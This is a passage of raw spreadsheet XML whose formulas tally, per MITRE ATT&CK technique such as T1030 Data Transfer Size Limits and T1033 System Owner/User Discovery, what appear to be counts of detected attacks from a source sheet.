        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>5</v>
      </c>
      <c r="AG10" s="322" t="str">
        <f t="shared" si="4"/>
        <v>5 (7)</v>
      </c>
      <c r="AH10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>5</v>
      </c>
      <c r="AI10" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>70</v>
      </c>
      <c r="AL10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>13</v>
      </c>
      <c r="AM10" s="322" t="str">
        <f t="shared" si="5"/>
        <v>13 (70)</v>
      </c>
      <c r="AN10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>9</v>
      </c>
      <c r="AO10" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>7</v>
      </c>
      <c r="AQ10" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR10" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS10" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT10" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU10" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>20</v>
      </c>
      <c r="AX10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>5</v>
      </c>
      <c r="AY10" s="322" t="str">
        <f t="shared" si="7"/>
        <v>5 (20)</v>
      </c>
      <c r="AZ10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA10" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>5</v>
      </c>
      <c r="BC10" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>28</v>
      </c>
      <c r="BD10" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>10</v>
      </c>
      <c r="BE10" s="4" t="str">
        <f t="shared" si="8"/>
        <v>10 (28)</v>
      </c>
      <c r="BF10" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>6</v>
      </c>
      <c r="BG10" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>7</v>
      </c>
      <c r="BI10" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>4</v>
      </c>
      <c r="BJ10" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>3</v>
      </c>
      <c r="BK10" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (4)</v>
      </c>
      <c r="BL10" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>3</v>
      </c>
      <c r="BM10" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO10" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>11</v>
      </c>
      <c r="BP10" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>10</v>
      </c>
      <c r="BQ10" s="4" t="str">
        <f t="shared" si="10"/>
        <v>10 (11)</v>
      </c>
      <c r="BR10" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>3</v>
      </c>
      <c r="BS10" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>3</v>
      </c>
      <c r="BT10" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>7</v>
      </c>
      <c r="BV10" s="292">
        <v>5</v>
      </c>
      <c r="BW10" s="322">
        <v>3</v>
      </c>
      <c r="BX10" s="4" t="str">
        <f t="shared" si="11"/>
        <v>3 (5)</v>
      </c>
      <c r="BY10" s="12">
        <v>3</v>
      </c>
      <c r="BZ10" s="13">
        <v>1</v>
      </c>
      <c r="CA10" s="394">
        <v>2</v>
      </c>
      <c r="CB10" s="288">
        <v>10</v>
      </c>
      <c r="CC10" s="4">
        <v>5</v>
      </c>
      <c r="CD10" s="4" t="str">
        <f t="shared" si="12"/>
        <v>5 (10)</v>
      </c>
      <c r="CE10" s="4">
        <v>3</v>
      </c>
      <c r="CF10" s="4">
        <v>2</v>
      </c>
      <c r="CG10" s="13">
        <v>1</v>
      </c>
      <c r="CH10" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="11" spans="1:93" ht="15" customHeight="1">
      <c r="A11" s="4">
        <f t="shared" si="13"/>
        <v>9</v>
      </c>
      <c r="B11" s="4" t="str">
        <f>IFERROR(VLOOKUP(A11,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1030</v>
      </c>
      <c r="C11" s="493" t="str">
        <f>IFERROR(VLOOKUP(B11,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="D11" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B11)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E11" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>68</v>
      </c>
      <c r="F11" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (68)</v>
      </c>
      <c r="G11" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>63</v>
      </c>
      <c r="H11" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>32</v>
      </c>
      <c r="I11" s="322" t="str">
        <f t="shared" si="0"/>
        <v>32 (63)</v>
      </c>
      <c r="J11" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K11" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>32</v>
      </c>
      <c r="M11" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>1</v>
      </c>
      <c r="N11" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>1</v>
      </c>
      <c r="O11" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P11" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q11" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S11" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>64</v>
      </c>
      <c r="T11" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>33</v>
      </c>
      <c r="U11" s="4" t="str">
        <f t="shared" si="2"/>
        <v>33 (64)</v>
      </c>
      <c r="V11" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W11" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>32</v>
      </c>
      <c r="Y11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>63</v>
      </c>
      <c r="Z11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>32</v>
      </c>
      <c r="AA11" s="322" t="str">
        <f t="shared" si="3"/>
        <v>32 (63)</v>
      </c>
      <c r="AB11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC11" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>32</v>
      </c>
      <c r="AE11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>99</v>
      </c>
      <c r="AF11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>97</v>
      </c>
      <c r="AG11" s="322" t="str">
        <f t="shared" si="4"/>
        <v>97 (99)</v>
      </c>
      <c r="AH11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>7</v>
      </c>
      <c r="AI11" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>34</v>
      </c>
      <c r="AK11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>162</v>
      </c>
      <c r="AL11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>129</v>
      </c>
      <c r="AM11" s="322" t="str">
        <f t="shared" si="5"/>
        <v>129 (162)</v>
      </c>
      <c r="AN11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>8</v>
      </c>
      <c r="AO11" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>34</v>
      </c>
      <c r="AQ11" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR11" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS11" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT11" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU11" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY11" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ11" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA11" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC11" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>64</v>
      </c>
      <c r="BD11" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>33</v>
      </c>
      <c r="BE11" s="4" t="str">
        <f t="shared" si="8"/>
        <v>33 (64)</v>
      </c>
      <c r="BF11" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG11" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>32</v>
      </c>
      <c r="BI11" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>9</v>
      </c>
      <c r="BJ11" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>5</v>
      </c>
      <c r="BK11" s="322" t="str">
        <f t="shared" si="9"/>
        <v>5 (9)</v>
      </c>
      <c r="BL11" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM11" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>5</v>
      </c>
      <c r="BO11" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>62</v>
      </c>
      <c r="BP11" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>33</v>
      </c>
      <c r="BQ11" s="4" t="str">
        <f t="shared" si="10"/>
        <v>33 (62)</v>
      </c>
      <c r="BR11" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS11" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>3</v>
      </c>
      <c r="BT11" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU11" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>33</v>
      </c>
      <c r="BV11" s="292">
        <v>0</v>
      </c>
      <c r="BW11" s="322">
        <v>0</v>
      </c>
      <c r="BX11" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY11" s="12">
        <v>0</v>
      </c>
      <c r="BZ11" s="13">
        <v>0</v>
      </c>
      <c r="CA11" s="394">
        <v>0</v>
      </c>
      <c r="CB11" s="288">
        <v>0</v>
      </c>
      <c r="CC11" s="4">
        <v>0</v>
      </c>
      <c r="CD11" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE11" s="4">
        <v>0</v>
      </c>
      <c r="CF11" s="4">
        <v>0</v>
      </c>
      <c r="CG11" s="13">
        <v>0</v>
      </c>
      <c r="CH11" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:93" ht="15" customHeight="1">
      <c r="A12" s="4">
        <f t="shared" si="13"/>
        <v>10</v>
      </c>
      <c r="B12" s="4" t="str">
        <f>IFERROR(VLOOKUP(A12,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1033</v>
      </c>
      <c r="C12" s="493" t="str">
        <f>IFERROR(VLOOKUP(B12,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="D12" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B12)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E12" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F12" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (13)</v>
      </c>
      <c r="G12" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H12" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I12" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J12" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K12" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M12" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N12" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O12" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P12" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q12" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S12" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>0</v>
      </c>
      <c r="T12" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>0</v>
      </c>
      <c r="U12" s="4" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V12" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="W12" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0</v>
      </c>
      <c r="X12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>0</v>
      </c>
      <c r="Y12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>5</v>
      </c>
      <c r="Z12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA12" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (5)</v>
      </c>
      <c r="AB12" s="392">
